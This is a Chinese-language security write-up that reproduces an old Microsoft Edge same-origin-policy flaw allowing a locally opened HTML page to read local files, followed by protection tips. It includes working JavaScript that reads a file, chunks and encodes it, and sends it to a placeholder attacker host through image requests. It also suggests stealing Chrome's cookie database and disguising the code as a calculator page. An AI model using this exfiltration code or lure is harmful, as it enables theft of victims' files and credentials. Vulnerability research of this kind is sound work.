漏洞介绍

近期看到文章介绍，称Microsoft Edge对SOP同源策略处理存在问题，可导致任意文件泄露。

SOP同源策略是比较常见的，简单来说，在访问A域名时，如果B域名站点存在JS动作通过XHR请求了A域名网站下资源，该动作会被同源策略拒绝，因为它们非同源。同源的判定标准是一个三元组，任意一个不同则判定不同源：协议、主机名、端口号

在浏览器中，可以使用file://协议来读取文件，攻击者如果想要读取到访问者的本地文件，由于http和file协议不同，不同源的情况下并不能做到。

但是这个限制在特定场景下就不存在了，如果恶意页面是保存在本地的文件，通过浏览器打开html文件，URL中协议就是file://，此时如果页面中存在XHR请求file://协议，该请求是符合同源要求的，可能导致本地文件读取。

复现测试

0x01 准备工作

尝试读取的本地文件：

poc代码：

0x02 非Microsoft Edge浏览器测试

Chrome浏览器：提示同源策略请求只支持http,data,chrome,chrome-extension,https协议

fireforx浏览器：提示同源策略进制读取，CORS只能是http协议

ie11浏览器：提示拒绝访问

0x03 Microsoft Edge浏览器测试

看到的文章中测试版本是Microsoft Edge 40.15063.0.0，这里测试使用的是比它更新的版本：

测试结果是：没有触发错误拦截信息，能够直接获取到本地文件内容：

相关拓展

0x01 任意数据外带

在测试中是仅仅对一个txt文件内容进行了读取，并将内容展示在页面中。

还可以读取其他浏览器存储的一些cookie信息，如：

Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies

攻击者如果想要通过恶意页面，将本地的数据带出，也是轻而易举的。比如，可以在js中创建img标签，发起http请求攻击者的服务器，并且携带读取到的文件内容。

如果文件内容过长，get请求的URL会超长，还能对文件内容进行分割、间隔多次传输；

如果文件内容不仅是文本文字，或是图片等，还能通过各种编码进行包装传输（如encodeURI）：

let resultDiv = document.getElementById("result");    let data = "";        let xhr= new XMLHttpRequest();        let limit = 1024    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");        xhr.onreadystatechange= function () {            if(xhr.readyState==4) {                resultDiv.innerText = xhr.responseText;            url =  "http://XXXXX.ceye.io/data/?data=";               // data = window.btoa(xhr.responseText);              data = encodeURI(xhr.responseText);              console.log(data.length)            let st=setInterval(function(){                img = document.createElement("img");                if (data.length <= limit) {                    if (data.length == 0) {                        clearInterval(st)                    }else {                        img.src = url + data;                        resultDiv.appendChild(img);                        clearInterval(st)                        console.log("A:"+data.length)                    }                } else {                    temp = data.substr(0, limit);                    data = data.substr(limit,data.length-1);                    img.src = url + temp;                    resultDiv.appendChild(img);                    console.log("B:"+temp.length)                }             },1000)        }        }        xhr.send();

攻击者接收的数据段之一：

0x02 隐藏伪装

造成任意文件内容泄露的JS代码本体并不大，可以隐藏在其他正常的下载页面中，在用户疏于防范的情况下隐蔽地执行；

结合社会工程等手段，可以更轻易地进行攻击利用。例如，当下载一个用于学习html的网页，作者建议使用Microsoft Edge进行打开，你很可能会听从作者建议就运行查看效果

当页面功能显示正常，是一个计算器的网页，警惕心就没有了。

当你可能还沉浸在玩耍它的计算功能和学习源码的过程中时，攻击者想要的你本地文件内容可能已经被偷偷传走了

防护建议

1、不要随意打开不能确定是否存在危害的文件，包括html文件（先看一遍源代码）

2、使用解决了该问题的更新版本的Microsoft Edge3、使用Chrome或者Firefox等浏览器